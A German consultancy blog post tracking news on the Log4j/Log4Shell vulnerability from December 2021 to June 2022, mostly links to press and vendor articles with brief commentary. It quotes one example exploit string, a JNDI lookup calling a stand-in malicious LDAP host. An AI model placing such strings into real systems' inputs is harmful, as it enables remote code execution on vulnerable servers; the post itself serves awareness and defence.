Update vom 24.06.2022
- Artikel bei HEISE: Angreifer nutzen kontinuierlich Log4Shell-Lücke in VMware Horizon aus
Links siehe unten.
Update vom 19.06.2022
- Artikel bei HEISE: AWS: Amazon-Hotpatch für log4j-Lücke ermöglicht Rechteausweitung
Links siehe unten.
Update vom 27.04.2022
- Artikel bei HEISE: Lagebild: Gefahr durch kritische Log4Shell-Lücke ungebrochen
Links siehe unten.
Update vom 22.04.2022
- Artikel bei GOLEM: Das Parkleitsystem Frankfurt am Main war von der Lücke betroffen. Patchen? Nee – da wird es lieber Offline genommen und von Hand verwaltet. Nun ja…
Links siehe unten.
Update vom 20.04.2022
- Artikel bei GOLEM: Amazon hat in seine Cloud AWS mehrere fundamentalen Fehler in das Update
Links siehe unten.
Update vom 29.01.2022
- Artikel bei Heise: Log4Shell: Eine Bestandsaufnahme
Links siehe unten.
Update vom 11.01.2022
- Artikel bei Inside-IT.ch: Log4j: Noch gar nicht viel passiert, aber…
Links siehe unten.
Update vom 10.01.2022
- Artikel bei Datensicherheit.de: Log4j: US-Behörden drängen Unternehmen zur Behebung der Sicherheitslücke
Links siehe unten.
Update vom 05.01.2022
- Artikel bei Heise: Log4j – warum Open Source kaputt ist
Links siehe unten.
Update vom 23.12.2021
- Artikel bei Golem: Alibaba hätte Log4J-Lücke schneller an China melden müssen
- Artikel bei INGENIEUR.DE: Log4J-Sicherheitslücke: Warum der Fehler unvermeidbar war
Links siehe unten.
Update vom 20.12.2021
- Artikel bei Heise:
- Erpressergruppe Conti nutzt Sicherheitslücke „Log4Shell“ für ihre Ransomware
- Erster Wurm „kriecht“ durch Log4j-Sicherheitslücke
- Angriff auf Netz des belgischen Verteidigungsministeriums
- Nach Log4j: Warum Open-Source-Projekte nachhaltig werden müssen
- Artikel in der Frankfurter Allgemeinen Zeitung: Das perfekte trojanische Pferd
- Artikel bei Golem: Mehrheit der Java-Pakete hat noch kein Log4J-Update
- Artikel im Spiegel: Der Grinch der Computersicherheit – Ein Netzwelt-Newsletter
Links siehe unten.
Update vom 18.12.2021
- Artikel bei Heise: Schwachstelle Log4j : Bundesfinanzhof schaltet Website nach Hackerangriff ab
- Artikel von Apache: Apache Log4j Security Vulnerabilities
- Artikel bei Zeit Online: Interview mit Adriana Groh (Open Knowledge Foundation): „Wir rasen an metertiefen Schlaglöchern vorbei, ohne es zu merken“)
Links siehe unten.
Update vom 17.12.2021
- Artikel in der Frankfurter Allgemeinen Zeitung: Schwachstelle Log4j : Bundesfinanzhof schaltet Website nach Hackerangriff ab
- Artikel im Spektrum der Wissenschaft: Open-Source-Software: Offen für alles?
Links siehe unten.
Zu Log4j
Dieses Thema ist nicht direkt Datenschutz – aber so wichtig, dass ich hier versuchen werde, den aktuellen Stand wiederzugeben.
BSI gibt Alarmstufe ROT – Extrem gefährlich Lücke in einer Vielzahl von Software.
Es handelt sich sehr wahrscheinlich um die größte Sicherheitslücke der letzten Jahre.
In einer sehr oft benutzten Java-Bibliothek (Log4j) gibt es eine einfach auszunutzende Sicherheitslücke.
Machbarkeitsstudien (Proof of Concept) zur Ausnutzung sind bereits offen verfügbar. Laut dem IT-Sicherheitsunternehmen Cloudflare sind entsprechende Angriffsaktivitäten seit dem 1.12.2021 aktiv – das wurde jetzt am 12.12.2021 nachträglich festgestellt.
Golem schreibt dazu:
Der Aufruf folgt dabei etwa diesem Muster: ${jndi:ldap://boese-domain.golem.de/a}. Ist das angegriffene Ziel im Netz verfügbar, führt dies leicht zu einer Remote-Code-Execution (RCE), also dem Ausführen von Schadcode.
So wurde dies in ähnlicher Form in einen Chat bei Minecraft eingebracht – und das Spiel spielte nach den Regeln des Eindringlings…
Zur Zeit laufen aber Massenscans von Hackern, um verwundbare Server aufzuspüren. Es ist dringend anzuraten, die Hinweise des BSI in dem PDF zu lesen und zu berücksichtigen.
Zwischeninfos
- Laut Heise meldet Microsoft Attacken mit dem Plazieren von Cobalt Strike Beacons – das sind „Brückenköpfe“ für eine spätere Attacke.
- Golem berichtet, dass der Entwickler dieser weltweit eingesetzten Software das in seiner Freizeit gemacht hat…
Kommentar dieses Blog-Autors: Jeder setzt es ein – aber keiner will was bezahlen. Dann muss man sich nicht wundern. Siehe dazu auch den Kommentar in der Süddeutschen. - Heise berichtet, dass Sicherheitsforscher festgestellt haben, dass Angriffe unabhängig von der Java-Version und bestimmten Java-Sicherheitseinstellungen funktionieren.
- Laut CheckPoint schnellten die Angriffe vom 11.12.2021 bis zum 13.12.2021 von ca. 40.000 auf etwa 830.000 hoch.
- Die Süddeutsche Zeitung und die Neue Züricher Zeitung (NZZ) melden am 15.12.2021, dass nun staatliche Hacker aus NordKorea, China, Türkei und Iran aktiv bei den Angriffen mitmischen.
- Auch die NZZ meldet, dass schon am 24.11.2021 von Alibaba die Lücke entdeckt wurde:
-
Die ersten Angriffe fanden aber bereits früher statt. Am 24. November hatte ein Mitarbeiter des chinesischen Internetkonzerns Alibaba erstmals die Verantwortlichen des Open-Source-Projekts Log4j über die Schwachstelle in der Software informiert, wie Bloomberg berichtet. Eine Woche später, am 1. Dezember, tauchten beim großen Internetdienstleister Cloudflare die ersten Spuren (Anm. Autor: Matthew Prince, Co-founder & CEO of Cloudflare, Twitter @eastdakota) von Angriffen auf.
Zu diesem Zeitpunkt kursierten offenbar bereits Details zur Schwachstelle in China. Denn am 8. Dezember schrieb der Alibaba-Mitarbeiter laut Bloomberg dem Team hinter Log4j, dass es sich beeilen müsse. Die Schwachstelle sei auf einer chinesischen Plattform veröffentlicht worden, und auf dem Messenger-Dienst WeChat gebe es Diskussionen darüber. Am Tag danach informierten die Entwickler offiziell über die Sicherheitslücke und veröffentlichten ein Update.
-
- Schauen Sie bitte regelmäßig auf die Seiten der Hersteller. So ist log4j am 17.12.2021 wieder erneuert worden …
Weiterführende Links:
- !!! BSI – Einleitung und Hinweise (PDF)
- Titel: Kritische Schwachstelle in Java-Bibliothek Log4j
Hier gibt es jetzt ein Dokument mit detaillierteren Informationen zu Detektion und Reaktion, das laufend vom BSI aktualisiert wird. – Link
- Titel: Kritische Schwachstelle in Java-Bibliothek Log4j
Diverse Infos
- Apache
- Apache Log4j Security Vulnerabilities – Link
- Bitte täglich checken, da es immer wieder Neuerungen gibt...
- CheckPoint
- The Numbers Behind Log4j Vulnerability CVE-2021-44228 / Anzahl der Angriffe – Link
- Datensicherheit.de
- Log4j: US-Behörden drängen Unternehmen zur Behebung der Sicherheitslücke – Link
- Deutsches Forschungsnetzwerk DFN
- Regelmäßige Updates – Link
- Microsoft
- Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation – Link
- NIST (National Institute of Standards and Technology)
- CVE-2021-44228 Detail
- Open Knowledge Foundation Deutschland e.V.
- QNAP
- Vulnerability in Apache Log4j Library – Link
- Spektrum der Wissenschaft: Open-Source-Software: Offen für alles?
- Sicherheitsexperte SwitHak hat bei GitHub eine Teil-Auflistung betroffener Systeme
- Wikipedia – Was ist Log4j? – Link
- Frankfurter Allgemeinen Zeitung vom…
- 16.12.2021 (Titel: Log4j-Entwickler Christian Grobmeier: „Man muss aufpassen, nicht durchzudrehen“)
- 17.12.2021 (Titel: Schwachstelle Log4j : Bundesfinanzhof schaltet Website nach Hackerangriff ab)
- 20.12.2021 (Titel: Das perfekte trojanische Pferd)
- GOLEM vom…
- 12.12.2021
- 13.12.2021 (Titel: Warum Log4Shell so gefährlich ist und was (nicht) hilft)
(Viel Tipps + umfangreiche Erklärungen) - 14.12.2021 (Kommentar: BSI gibt vorschnell Entwarnung für Verbraucher)
- 15.12.2021 (Titel: Bundesland nimmt IT-Systeme wegen Log4J-Lücke offline)
- 15.12.2021 (Titel: Log4J: Erstes Update für Log4Shell-Lücke nicht vollständig)
- 20.12.2021 (Titel: Mehrheit der Java-Pakete hat noch kein Log4J-Update)
- 23.12.2021 (Titel: Alibaba hätte Log4J-Lücke schneller an China melden müssen)
- 20.04.2022 (Titel: Log4J: AWS-Patch für Log4Shell ermöglicht Root-Rechte)
- 22.04.2022 (Titel: Wegen LOG4J: Frankfurter Parkleitsystem muss händisch verwaltet werden)
- Heise vom…
- 10.12.2021
- 12.12.2021
- 13.12.2021 (Tipps)
- 14.12.2021 (Titel: Log4j 2.16.0 verbessert Schutz vor Log4Shell-Lücke)
- 14.12.2021 (Kommentar zu Log4j: Es funktioniert wie spezifiziert)
Anm. Red.: Man kann es auch eine „Abrechnung“ mit Java nennen… - 14.12.2021 (Titel: GitHubs Antwort auf die kritische Log4j-Lücke)
- 15.12.2021 (Titel: Neue Probleme – Log4j-Patch genügt nicht)
- 16.12.2021 (Video: #heiseshow: Die Log4j-Lücke – was jetzt zu beachten ist)
Auch laut Heise direkt bei Twitch.TV: Link - 18.12.2021 (Titel: Google: OSS-Fuzz soll Log4j-Fehler in Open-Source-Software finden)
- 20.12.2021 (Titel: Erpressergruppe Conti nutzt Sicherheitslücke „Log4Shell“ für ihre Ransomware)
- 20.12.2021 (Titel: Erster Wurm „kriecht“ durch Log4j-Sicherheitslücke)
- 20.12.2021 (Titel: Angriff auf Netz des belgischen Verteidigungsministeriums)
- 20.12.2021 (Titel: Nach Log4j: Warum Open-Source-Projekte nachhaltig werden müssen)
- 05.01.2022 (Titel: Log4j – warum Open Source kaputt ist)
- 29.01.2022 (Titel: Log4Shell: Eine Bestandsaufnahme)
- 27.04.2022 (Titel: Lagebild: Gefahr durch kritische Log4Shell-Lücke ungebrochen)
- 19.06.2022 (Titel: AWS: Amazon-Hotpatch für log4j-Lücke ermöglicht Rechteausweitung)
- Update vom 19.06.2022
Artikel bei HEISE: AWS: Amazon-Hotpatch für log4j-Lücke ermöglicht Rechteausweitung
Links siehe unten. (Titel: Angreifer nutzen kontinuierlich Log4Shell-Lücke in VMware Horizon aus)
- INGENIEUR.DE vom …
- 23.12.2021 (Titel: Log4J-Sicherheitslücke: Warum der Fehler unvermeidbar war)
- INSIDE-IT.CH vom …
- 11.01.2022 (Titel: Log4j: Noch gar nicht viel passiert, aber…)
- Neue Züricher Zeitung vom…
- 15.12.2021 (Titel: Bitcoin-Schürfer haben die Schwachstelle in Log4j als Erste ausgenutzt – und jetzt folgen die staatlichen Hacker)
- 16.12.2021 (Titel: Log4j wurde 1997 in der Schweiz entwickelt – der Erfinder Ceki Gülcü erzählt)
- Süddeutsche Zeitung vom…
- 12.12.2021 (€ – SZplus)
- 13.12.2021 (Kommentar – der es auf den Punkt bringt)
- 13.12.2021 (Titel: BSI zu „Log4j“: Verbraucher noch nicht betroffen)
- 15.12.2021 (Titel: Log4Shell – Die Angriffswellen rollen)
- Spiegel vom…
- 11.12.2021
- 12.12.2021
- 13.12.2021 (Titel: Wie löscht man ein brennendes Internet?)
- 16.12.2021 (Titel: BSI-Präsident warnt Log4j-Schwachstelle könnte Millionenschäden zur Folge haben)
- 20.12.2021 (Titel: Der Grinch der Computersicherheit – Ein Netzwelt-Newsletter)
- Zeit Online
- 18.12.2021 (Titel: Interview mit Adriana Groh (Open Knowledge Foundation): „Wir rasen an metertiefen Schlaglöchern vorbei, ohne es zu merken“)
Sie benötigen Hilfe beim Datenschutz in Ihrem Unternehmen? Wir beraten pragmatisch ohne Firelfanz und stellen den Datenschutzbeauftragten im Raum Frankfurt am Main, Offenbach am Main, Wiesbaden, Darmstadt, Mainz, Rhein-Main, Rhein-Main-Neckar, Hessen, Bayern, Rheinland-Pfalz, Baden-Württemberg, RheinMain oder in ganz Deutschland. Nehmen Sie einfach Kontakt mit uns auf. Hinweis Die Informationen auf unserer Webseite dienen ausschließlich zu Informationszwecken. Bei der Darbringung der Informationen achten wir darauf, dass diese genau und aktuell sind. Aber beachten Sie, die Inhalte stellen keine Datenschutzberatung da. Bei Datenschutzfragen ist jeweils der Einzelfall zu betrachten. Bitte haben Sie Verständnis, dass wir jegliche Haftung für Inhalte Dritter, die über unsere Website aufgerufen werden können, ablehnen. |